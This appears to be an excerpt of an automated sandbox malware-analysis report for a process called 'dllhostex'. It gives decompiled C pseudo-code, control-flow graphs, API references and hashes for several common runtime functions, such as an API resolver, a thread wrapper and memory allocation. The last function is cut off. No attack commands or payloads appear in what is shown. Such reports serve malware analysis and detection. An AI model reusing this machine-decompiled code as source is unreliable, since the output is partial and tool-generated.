                                                0x013603b9
                                                0x013603ba
                                                0x013603bc
                                                0x013603c2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013603c2
                                                0x013603ca
                                                0x013603cd
                                                0x013603e1
                                                0x013603e9
                                                0x0136040d
                                                0x013603eb
                                                0x013603eb
                                                0x013603f1
                                                0x013603f6
                                                0x00000000
                                                0x00000000
                                                0x013603f6
                                                0x00000000
                                                0x013603f8
                                                0x013603f8
                                                0x013603fb
                                                0x01360401
                                                0x01360405
                                                0x0136040f
                                                0x01360415
                                                0x01360421

                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,00000000,?,01360888,?,00000000,00000000,?,0000000D,00000000), ref: 013603E1
                                                • GetLastError.KERNEL32(?,01360888,?,00000000,00000000,?,0000000D,00000000,00000000,?,00000000,?,?,00000001,?,?), ref: 01360407
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID:
                                                • API String ID: 442123175-0
                                                • Opcode ID: b1e89f0685110b40c09681fda5efb1717585215dd862a1fe67148fd1123850cc
                                                • Instruction ID: 8b3c5e9fcb5557db37f86f694076d35af4e5dbeaee9aeac008e8ae59dbb5ac6b
                                                • Opcode Fuzzy Hash: b1e89f0685110b40c09681fda5efb1717585215dd862a1fe67148fd1123850cc
                                                • Instruction Fuzzy Hash: 5521D835A002199FCB2ACF29DD809D9B7BDEF4D305F1481A9EA06E7205D630DD42CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01366FEE Relevance: 3.1, APIs: 2, Instructions: 56COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 214 1366fee-1367015 215 1367017-1367019 214->215 216 136701b-136701d 214->216 219 136706c-136706f 215->219 217 1367023-136702a call 1366f26 216->217 218 136701f-1367021 216->218 221 136702f-1367033 217->221 218->219 222 1367035-1367043 GetProcAddress 221->222 223 1367052-1367069 221->223 222->223 224 1367045-1367050 call 13537be 222->224 225 136706b 223->225 224->225 225->219
                                                C-Code - Quality: 85%
                                                			E01366FEE(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x13d54d0 + _a4 * 4;
				_t28 =  *0x13cc074; // 0x4132269f
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E01366F26(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x13cc074;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E013537BE(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}












                                                0x01366ff8
                                                0x01367001
                                                0x01367007
                                                0x0136700c
                                                0x0136700e
                                                0x01367011
                                                0x01367015
                                                0x0136701d
                                                0x0136702a
                                                0x01367033
                                                0x01367052
                                                0x01367057
                                                0x0136705f
                                                0x01367067
                                                0x01367069
                                                0x0136706b
                                                0x00000000
                                                0x0136706b
                                                0x0136703f
                                                0x01367043
                                                0x00000000
                                                0x00000000
                                                0x0136704c
                                                0x0136704e
                                                0x00000000
                                                0x0136704e
                                                0x00000000
                                                0x0136701f
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f4d739b2e3ff6c41bfe6eda9bd69a3ec2662a783bb5ac346dc6e4f1ca94e694
                                                • Instruction ID: 659cb757d963e8c074d2c47b6f6826fd8147e409ee045a3b6b0bca03bbd60b6d
                                                • Opcode Fuzzy Hash: 9f4d739b2e3ff6c41bfe6eda9bd69a3ec2662a783bb5ac346dc6e4f1ca94e694
                                                • Instruction Fuzzy Hash: 4B01F97B6005159FEB35CD6DED4095637AEAB8536CB54C220FA05CB68CDA31D8018760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01360D9D Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 49%
                                                			E01360D9D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				signed int _t18;
				void* _t23;
				intOrPtr* _t30;
				void* _t33;

				_t23 = __ecx;
				_t22 = __ebx;
				_push(0x10);
				_push(0x13c8258);
				E01374290(__ebx, __edx, __edi, __esi);
				_t30 =  *((intOrPtr*)(_t33 + 8));
				if(_t30 == 0) {
					ExitThread(GetLastError());
				}
				 *((intOrPtr*)(E01365D22(_t23, __edx) + 0x360)) = _t30;
				_t11 = E01369F60(_t23); // executed
				_t36 = _t11 - 2;
				if(_t11 == 2) {
					_t18 = E01367619(_t23, _t36, 1);
					asm("sbb al, al");
					 *((char*)(_t30 + 0x10)) =  ~_t18 + 1;
				}
				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
				 *0x13ae364( *((intOrPtr*)(_t30 + 4)));
				E01360F80( *_t30,  *((intOrPtr*)( *_t30))());
				 *((intOrPtr*)(_t33 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 - 0x14))))));
				return E01362F4F(_t22,  *((intOrPtr*)(_t33 - 0x14)), _t30,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 - 0x14)))))),  *((intOrPtr*)(_t33 - 0x14)));
			}








                                                0x01360d9d
                                                0x01360d9d
                                                0x01360d9d
                                                0x01360d9f
                                                0x01360da4
                                                0x01360da9
                                                0x01360dae
                                                0x01360db7
                                                0x01360db7
                                                0x01360dc2
                                                0x01360dc8
                                                0x01360dcd
                                                0x01360dd0
                                                0x01360dd4
                                                0x01360ddb
                                                0x01360ddf
                                                0x01360ddf
                                                0x01360de2
                                                0x01360ded
                                                0x01360df6
                                                0x01360e02
                                                0x01360e0e

                                                APIs
                                                • GetLastError.KERNEL32(013C8258,00000010), ref: 01360DB0
                                                • ExitThread.KERNEL32 ref: 01360DB7
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorExitLastThread
                                                • String ID:
                                                • API String ID: 1611280651-0
                                                • Opcode ID: e2b0bd44b2a08a85a574d9d2fb5f6622203821fab339402b14b971791e26e932
                                                • Instruction ID: 434c09f5a7470d3c5e11a08fe0df43c4737033266816c7f5e2d60bf7fa5495bd
                                                • Opcode Fuzzy Hash: e2b0bd44b2a08a85a574d9d2fb5f6622203821fab339402b14b971791e26e932
                                                • Instruction Fuzzy Hash: 72F0C270940706AFDB15ABB8C84AB6E3B7CFF5471CF208558F0019B299CB746D10DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01353728 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 1353728-135372b 229 135373a-135373d call 135c9da 228->229 231 1353742-1353745 229->231 232 1353747-1353748 231->232 233 135372d-1353738 call 1362eb9 231->233 233->229 236 1353749-135374d 233->236 237 1353753-1354237 call 13522b9 call 13555d7 236->237 238 1354238-1354254 call 1354203 call 13555d7 236->238 237->238
                                                C-Code - Quality: 54%
                                                			E01353728(void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				void* _t11;
				void* _t12;
				void* _t21;
				void* _t22;
				char* _t23;
				void* _t27;
				void* _t28;
				void* _t30;

				while(1) {
					_push(_a4);
					_t11 = E0135C9DA(_t21); // executed
					_pop(_t22);
					if(_t11 != 0) {
						break;
					}
					_t12 = E01362EB9(_t22, __eflags, _a4);
					_pop(_t21);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags = _a4 - 0xffffffff;
						if(_a4 != 0xffffffff) {
							_push(_t27);
							_t27 = _t30;
							_t30 = _t30 - 0xc;
							E013522B9( &_v20);
							E013555D7( &_v20, 0x13c7c74);
							asm("int3");
						}
						_push(_t27);
						_t28 = _t30;
						_t23 =  &_v20;
						E01354203(_t23);
						E013555D7( &_v20, 0x13c7dd4);
						asm("int3");
						_push(_t28);
						_push(_t23);
						_v28 = 0;
						return E013656E2(_v16);
					} else {
						continue;
					}
					L10:
				}
				return _t11;
				goto L10;
			}














                                                0x0135373a
                                                0x0135373a
                                                0x0135373d
                                                0x01353742
                                                0x01353745
                                                0x00000000
                                                0x00000000
                                                0x01353730
                                                0x01353735
                                                0x01353736
                                                0x01353738
                                                0x01353749
                                                0x0135374d
                                                0x0135421b
                                                0x0135421c
                                                0x0135421e
                                                0x01354224
                                                0x01354232
                                                0x01354237
                                                0x01354237
                                                0x01354238
                                                0x01354239
                                                0x0135423e
                                                0x01354241
                                                0x0135424f
                                                0x01354254
                                                0x0135c9e7
                                                0x0135c9ea
                                                0x0135c9ee
                                                0x0135ca01
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01353738
                                                0x01353748
                                                0x00000000

                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 01354232
                                                  • Part of subcall function 013555D7: RaiseException.KERNEL32(?,?,?,01354254,?,?,?,?,?,?,?,?,01354254,?,013C7DD4), ref: 01355637
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0135424F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID:
                                                • API String ID: 3476068407-0
                                                • Opcode ID: 3431d179aea234818818283648449243337b0c463a7c21127ac63fbe77c2dc80
                                                • Instruction ID: da17bbaed3d23b02e14536a5aaffdc60a54af2c208347953dbb0d26434267380
                                                • Opcode Fuzzy Hash: 3431d179aea234818818283648449243337b0c463a7c21127ac63fbe77c2dc80
                                                • Instruction Fuzzy Hash: B1F0B475C0020EB6CB84B6BCEC59C9D377C6E20E9CB108624EE3995490FF30EB588AD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01293370 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 267 1293370-12933b4 268 12933ba-12933d5 267->268 269 1293577 call 1291300 267->269 271 12933de-12933e6 268->271 272 12933d7-12933dc 268->272 273 129357c-12935a0 call 135b7b1 call 1292370 call 12923a0 call 13555d7 269->273 274 12933e9-12933f5 271->274 272->274 276 12933fc-1293402 274->276 277 12933f7-12933fa 274->277 279 1293404-129341a call 1353728 276->279 280 129342b-129342d 276->280 277->279 279->273 289 1293420-1293429 279->289 281 129343c 280->281 282 129342f-1293430 call 1353728 280->282 286 129343e-1293486 281->286 290 1293435-129343a 282->290 291 1293488-129349a 286->291 292 12934df-12934f4 call 12935b0 * 2 286->292 289->286 290->286 295 12934a0-12934a2 291->295 302 12934f9-12934fd 292->302 298 12934a4-12934b3 295->298 299 12934f6 295->299 303 12934d1-12934dd 298->303 304 12934b5-12934ce call 135378e call 1355650 298->304 299->302 307 129354a-1293574 302->307 308 12934ff-1293504 302->308 303->295 304->303 310 129351e-129352c 308->310 311 1293506 308->311 315 129352e-129353c 310->315 316 1293540-1293547 call 1353758 310->316 313 1293508-1293517 call 1353789 311->313 323 1293519-129351b 313->323 315->273 320 129353e 315->320 316->307 320->316 323->310
                                                C-Code - Quality: 59%
                                                			E01293370(signed int __ecx, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed int _t76;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				intOrPtr _t103;
				intOrPtr _t105;
				signed int _t107;
				void* _t108;
				intOrPtr _t110;
				signed int* _t112;
				intOrPtr* _t113;
				intOrPtr* _t117;
				unsigned int _t120;
				signed int _t126;
				signed int _t131;
				intOrPtr* _t132;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t144;
				intOrPtr* _t145;
				intOrPtr _t147;
				signed int _t148;
				intOrPtr* _t150;
				void* _t153;
				intOrPtr _t154;

				_t116 = __ecx;
				_push(0xffffffff);
				_push(0x13aaca8);
				_push( *[fs:0x0]);
				_t154 = _t153 - 0x2c;
				_push(_t133);
				_t71 =  *0x13cc074; // 0x4132269f
				_push(_t71 ^ _t151);
				 *[fs:0x0] =  &_v16;
				_v20 = _t154;
				_t112 = __ecx;
				_t128 =  *__ecx;
				_t76 =  *((intOrPtr*)(__ecx + 4)) - _t128 >> 3;
				_t144 = _a4 - _t128 >> 3;
				if(_t76 == 0x1fffffff) {
					E01291300(__ecx, _t128);
					goto L31;
				} else {
					_t6 = _t76 + 1; // 0x2
					_t133 = _t6;
					_v44 = _t133;
					_t120 =  *((intOrPtr*)(__ecx + 8)) - _t128 >> 3;
					_t131 = _t120 >> 1;
					if(_t120 <= 0x1fffffff - _t131) {
						_t86 = _t131 + _t120;
						__eflags = _t86 - _t133;
						_t87 =  <  ? _t133 : _t86;
						_v28 = _t87;
					} else {
						_t87 = _t133;
						_v28 = _t133;
					}
					_t116 = _t87 * 8;
					if(_t87 <= 0x1fffffff) {
						__eflags = _t116 - 0x1000;
						if(__eflags < 0) {
							__eflags = _t116;
							if(__eflags == 0) {
								_t133 = 0;
								__eflags = 0;
							} else {
								_push(_t116); // executed
								_t107 = E01353728(_t144, __eflags); // executed
								_t154 = _t154 + 4;
								_t133 = _t107;
							}
							goto L12;
						} else {
							goto L7;
						}
					} else {
						_t116 = _t116 | 0xffffffff;
						L7:
						_t108 = _t116 + 0x23;
						_t128 = _t131 | 0xffffffff;
						_t109 =  <=  ? _t131 | 0xffffffff : _t108;
						_push( <=  ? _t131 | 0xffffffff : _t108);
						_t110 = E01353728(_t144, _t108 - _t116);
						_t154 = _t154 + 4;
						if(_t110 == 0) {
							L31:
							E0135B7B1(_t112, _t116, _t128, _t133, __eflags);
							E01292370(_a8, _v32);
							E012923A0(_t112, _t133, _v36, _v28);
							E013555D7(0, 0);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t117 = _v64;
							_push(_t112);
							_t113 = _v60;
							_push(_t144);
							_t145 = _v56;
							_push(_t133);
							__eflags = _t117 - _t113;
							if(_t117 != _t113) {
								_t136 = _t145 - _t117;
								__eflags = _t136;
								do {
									 *_t145 =  *_t117;
									_t145 = _t145 + 8;
									 *((intOrPtr*)(_t136 + _t117 + 4)) =  *((intOrPtr*)(_t117 + 4));
									 *_t117 = 0;
									 *((intOrPtr*)(_t117 + 4)) = 0;
									_t117 = _t117 + 8;
									__eflags = _t117 - _t113;
								} while (_t117 != _t113);
							}
							return _t145;
						} else {
							_t13 = _t110 + 0x23; // 0x23
							_t133 = _t13 & 0xffffffe0;
							 *((intOrPtr*)(_t133 - 4)) = _t110;
							L12:
							_t121 = _a8;
							_t88 = _t144 * 8;
							_t147 = _a4;
							_t132 = _t88 + _t133;
							_v48 = _t88;
							_v8 = 0;
							_v32 = _t132 + 8;
							 *_t132 =  *_t121;
							 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t121 + 4));
							 *_t121 = 0;
							 *((intOrPtr*)(_t121 + 4)) = 0;
							_t92 = _t112[1];
							_v24 = _t133;
							_v36 = _t133;
							_a8 = _t132;
							_v40 = _t92;
							if(_t147 != _t92) {
								_push(_t133);
								_push(_t147);
								_push( *_t112);
								L32();
								_push(_v32);
								_push(_t112[1]);
								_push(_t147);
								L32();
							} else {
								_t150 = _v24;
								_t139 =  *_t112;
								_v60 = _t150;
								_v56 = _t150;
								_v52 = _t112;
								_v8 = 1;
								asm("o16 nop [eax+eax]");
								while(_t139 != _t92) {
									 *_t150 = 0;
									_t103 =  *((intOrPtr*)(_t139 + 4));
									 *((intOrPtr*)(_t150 + 4)) = _t103;
									_t164 =  *_t139;
									if( *_t139 != 0) {
										_push(_t103 + 1);
										_t105 = E0135378E(_t121, _t164);
										_t38 = _t150 + 4; // 0x8b0c428d
										_t121 =  *_t38 + 1;
										 *_t150 = _t105;
										E01355650(_t105,  *_t139,  *_t38 + 1);
										_t154 = _t154 + 0x10;
									}
									_t92 = _v40;
									_t150 = _t150 + 8;
									_v56 = _t150;
									_t139 = _t139 + 8;
								}
								_t133 = _v24;
							}
							_t148 =  *_t112;
							__eflags = _t148;
							if(_t148 == 0) {
								L29:
								 *_t112 = _t133;
								_t112[1] = _t133 + _v44 * 8;
								_t112[2] = _t133 + _v28 * 8;
								_t98 =  *_t112 + _v48;
								__eflags = _t98;
								 *[fs:0x0] = _v16;
								return _t98;
							} else {
								_t99 = _t112[1];
								__eflags = _t148 - _t99;
								if(_t148 != _t99) {
									_t138 = _t99;
									do {
										L01353789( *_t148);
										_t148 = _t148 + 8;
										_t154 = _t154 + 4;
										__eflags = _t148 - _t138;
									} while (_t148 != _t138);
									_t148 =  *_t112;
									_t133 = _v24;
								}
								_t126 = _t112[2] - _t148 & 0xfffffff8;
								__eflags = _t126 - 0x1000;
								if(_t126 < 0x1000) {
									L28:
									_push(_t126);
									E01353758(_t148);
									goto L29;
								} else {
									_t47 = _t148 - 4; // 0x1674f93b
									_t128 =  *_t47;
									_t116 = _t126 + 0x23;
									_t144 = _t148 - _t128;
									_t48 = _t144 - 4; // 0x1292e94
									__eflags = _t48 - 0x1f;
									if(__eflags > 0) {
										goto L31;
									} else {
										_t148 = _t128;
										goto L28;
									}
								}
							}
						}
					}
				}
			}





















































                                                0x01293370
                                                0x01293373
                                                0x01293375
                                                0x01293380
                                                0x01293381
                                                0x01293386
                                                0x01293387
                                                0x0129338e
                                                0x01293392
                                                0x01293398
                                                0x0129339b
                                                0x0129339d
                                                0x012933a9
                                                0x012933ac
                                                0x012933b4
                                                0x01293577
                                                0x00000000
                                                0x012933ba
                                                0x012933bd
                                                0x012933bd
                                                0x012933c2
                                                0x012933c5
                                                0x012933cf
                                                0x012933d5
                                                0x012933de
                                                0x012933e1
                                                0x012933e3
                                                0x012933e6
                                                0x012933d7
                                                0x012933d7
                                                0x012933d9
                                                0x012933d9
                                                0x012933e9
                                                0x012933f5
                                                0x012933fc
                                                0x01293402
                                                0x0129342b
                                                0x0129342d
                                                0x0129343c
                                                0x0129343c
                                                0x0129342f
                                                0x0129342f
                                                0x01293430
                                                0x01293435
                                                0x01293438
                                                0x01293438
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x012933f7
                                                0x012933f7
                                                0x01293404
                                                0x01293404
                                                0x01293407
                                                0x0129340c
                                                0x0129340f
                                                0x01293410
                                                0x01293415
                                                0x0129341a
                                                0x0129357c
                                                0x0129357c
                                                0x01293587
                                                0x01293592
                                                0x0129359b
                                                0x012935a0
                                                0x012935a1
                                                0x012935a2
                                                0x012935a3
                                                0x012935a4
                                                0x012935a5
                                                0x012935a6
                                                0x012935a7
                                                0x012935a8
                                                0x012935a9
                                                0x012935aa
                                                0x012935ab
                                                0x012935ac
                                                0x012935ad
                                                0x012935ae
                                                0x012935af
                                                0x012935b3
                                                0x012935b6
                                                0x012935b7
                                                0x012935ba
                                                0x012935bb
                                                0x012935be
                                                0x012935bf
                                                0x012935c1
                                                0x012935c5
                                                0x012935c5
                                                0x012935c7
                                                0x012935c9
                                                0x012935cb
                                                0x012935d1
                                                0x012935d5
                                                0x012935db
                                                0x012935e2
                                                0x012935e5
                                                0x012935e5
                                                0x012935c7
                                                0x012935ef
                                                0x01293420
                                                0x01293420
                                                0x01293423
                                                0x01293426
                                                0x0129343e
                                                0x0129343e
                                                0x01293441
                                                0x01293448
                                                0x0129344b
                                                0x0129344e
                                                0x01293454
                                                0x0129345b
                                                0x01293460
                                                0x01293465
                                                0x01293468
                                                0x0129346e
                                                0x01293475
                                                0x01293478
                                                0x0129347b
                                                0x0129347e
                                                0x01293481
                                                0x01293486
                                                0x012934df
                                                0x012934e0
                                                0x012934e1
                                                0x012934e3
                                                0x012934e8
                                                0x012934eb
                                                0x012934ee
                                                0x012934ef
                                                0x01293488
                                                0x01293488
                                                0x0129348b
                                                0x0129348d
                                                0x01293490
                                                0x01293493
                                                0x01293496
                                                0x0129349a
                                                0x012934a0
                                                0x012934a4
                                                0x012934aa
                                                0x012934ad
                                                0x012934b0
                                                0x012934b3
                                                0x012934b6
                                                0x012934b7
                                                0x012934bc
                                                0x012934c2
                                                0x012934c3
                                                0x012934c9
                                                0x012934ce
                                                0x012934ce
                                                0x012934d1
                                                0x012934d4
                                                0x012934d7
                                                0x012934da
                                                0x012934da
                                                0x012934f6
                                                0x012934f6
                                                0x012934f9
                                                0x012934fb
                                                0x012934fd
                                                0x0129354a
                                                0x0129354d
                                                0x01293552
                                                0x0129355b
                                                0x01293560
                                                0x01293560
                                                0x01293566
                                                0x01293574
                                                0x012934ff
                                                0x012934ff
                                                0x01293502
                                                0x01293504
                                                0x01293506
                                                0x01293508
                                                0x0129350a
                                                0x0129350f
                                                0x01293512
                                                0x01293515
                                                0x01293515
                                                0x01293519
                                                0x0129351b
                                                0x0129351b
                                                0x01293523
                                                0x01293526
                                                0x0129352c
                                                0x01293540
                                                0x01293540
                                                0x01293542
                                                0x00000000
                                                0x0129352e
                                                0x0129352e
                                                0x0129352e
                                                0x01293531
                                                0x01293534
                                                0x01293536
                                                0x01293539
                                                0x0129353c
                                                0x00000000
                                                0x0129353e
                                                0x0129353e
                                                0x00000000
                                                0x0129353e
                                                0x0129353c
                                                0x0129352c
                                                0x012934fd
                                                0x0129341a
                                                0x012933f5

                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0129359B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw
                                                • String ID:
                                                • API String ID: 2005118841-0
                                                • Opcode ID: 0c13ca3e2e298fca6c397930d68e3014d8754e2de9fa0e08dc826cdaccba2140
                                                • Instruction ID: 2b058c517116321fb30bbc6385a06eb84207ed6a8dbf8d3cbd445f578e51e363
                                                • Opcode Fuzzy Hash: 0c13ca3e2e298fca6c397930d68e3014d8754e2de9fa0e08dc826cdaccba2140
                                                • Instruction Fuzzy Hash: AD718DB6D101069FDF15CF6CC880AADBBF5FF48310F198269E919AB390E771A941CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013669EE Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 13669ee-1366a07 call 13669b3 call 1369cad 329 1366a10-1366a1f call 135b8fa 324->329 330 1366a09-1366a0b 324->330 334 1366a21-1366a26 329->334 335 1366a28-1366a31 call 135b8fa 329->335 331 1366aa0-1366aa2 330->331 337 1366a38-1366a48 334->337 339 1366a9c 335->339 341 1366a33 335->341 337->339 340 1366a4a-1366a56 337->340 344 1366a9e-1366a9f 339->344 342 1366a85-1366a9a 340->342 343 1366a58-1366a5d call 136571c 340->343 341->337 346 1366a81-1366a83 342->346 347 1366a62-1366a71 call 13656e2 343->347 344->331 346->344 347->342 350 1366a73-1366a7e 347->350 350->346
                                                C-Code - Quality: 97%
                                                			E013669EE(void* __eflags, intOrPtr* _a4) {
				void* _t14;
				void* _t16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t25;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;

				_t38 = _a4;
				if(E01369CAD(E013669B3(_t38)) != 0) {
					_t14 = E0135B8FA(1);
					_t25 = 2;
					if(_t38 != _t14) {
						if(_t38 != E0135B8FA(_t25)) {
							L12:
							_t16 = 0;
							L13:
							return _t16;
						}
						_t37 = 0x13d5270;
						L6:
						 *0x13d4f88 =  *0x13d4f88 + 1;
						_t2 = _t38 + 0xc; // 0xc
						_t31 = _t2;
						if(( *_t2 & 0x000004c0) != 0) {
							goto L12;
						}
						asm("lock or [ecx], eax");
						_t19 =  *_t37;
						if(_t19 != 0) {
							L11:
							 *((intOrPtr*)(_t38 + 4)) = _t19;
							 *_t38 =  *_t37;
							 *((intOrPtr*)(_t38 + 8)) = 0x1000;
							 *((intOrPtr*)(_t38 + 0x18)) = 0x1000;
							L10:
							_t16 = 1;
							goto L13;
						}
						_t21 = E0136571C(_t31, 0x1000); // executed
						 *_t37 = _t21;
						E013656E2(0);
						_t19 =  *_t37;
						if(_t19 != 0) {
							goto L11;
						}
						_t5 = _t38 + 0x14; // 0x14
						_t34 = _t5;
